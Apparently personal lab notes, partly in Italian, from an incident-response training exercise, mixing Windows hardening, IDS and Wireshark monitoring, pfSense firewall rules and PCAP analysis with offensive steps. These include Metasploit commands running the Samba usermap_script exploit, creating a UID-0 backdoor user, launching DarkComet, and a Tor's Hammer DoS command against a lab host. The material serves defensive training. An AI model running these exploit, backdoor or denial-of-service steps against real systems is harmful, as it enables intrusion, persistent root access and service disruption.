Identify Whether High-Risk Systems Were Affected:
msfconsole 
msf > use auxiliary/scanner/smb/smb_version

msf > set RHOSTS 192.168.1.50

run

msf > use exploit/multi/samba/usermap_script

msf > set rhost 192.168.1.50


exploit

whoami

useradd reyzenello -ou 0 -g root

id reyzenello

-----Post Incident Service Restoration 

Windows lercio:
-***
Change System Proprieties --> *inserire nome* --> Advanced --> Performance -- Settings --> Turn DEP for Windows programs

Remote --> allow connection only form computers running Remote Desktop 
--** 

User Accounts (dalla barra di ricerca) --> crea un user nuovo 

aggiungere l'utente al remote desktop completion 

Administrative Tools ---> Windwos Firewall with Advanced Security --> Turn on the firewall --> Outbound Rule Set -->  New Rule -> Port --> NExt --> Choose TCP -> Specific Local Ports --> type 1119,3724 --> Block the connection --> next e completa e rinomina la rule 

done 

Threat Response 
Kali2:
Setup di Onion IDS/IPS
Kali1:
Armitage impostazione 

Win7:
Windows Firewall Advanced Security --> block le porte 139 e 445

kali1:
TCP scan (nmap -sT sulla macchina Win7)

kali2:
wireshark

kali2:
restartare onion 

win7:
DarkComet + Execute Malware 

Microsoft Security Essential 

kali2:
vedere le catture di wireshark 
tcpdump

kali1: aggiungere la macchina XP 

kali2:
vedele le catture di wireshark 


Denial of Service PCAP Analysis 
kali1
python.exe C:\Users\Administrator\Desktop\torshammer.py -t 10.3.30.67 -r 100 -p 80

kali2:
pfsense --> Diagonostic --> Packet Capture --> WAN 10.3.30.67
(attesa 1min)
scarica la cattura e analizzarla con wireshark --> Follow TCP Stream 

Wireshark analisi fatta

pfsense
firewall --> rules -->   add new rule 

Destination type: Single host or alias
Destination address: 10.3.30.67
Destination port range, from and to: HTTP (80)
Description: Limit DoS Source

Action: Block
Interface: WAN
Protocol: ICMP- ICMP Type: any
Source type: WAN net

recover from web-based flashpack incident

wireshark 
http --> check sulla prima get --> follow TCP Stream --> scoprimo che l'host infetto � 172.16.165.132 mettiamo come filtro : ip.src == 172.16.165.132 OR ip.dst == 172.16.165.132

dopo l'analisi 
172.16.165.2 - DNS Server
172.16.165.132 - Client Machine
175.107.131.91 - www.betashares.com.au; GET requests
78.110.165.237 - ?
188.227.172.106 - ?

disabilitare la scheda di rete utilizza un punto di restore vecchio e disabilitare l' aggiornamento infetto e poi riattivare la scheda di rete  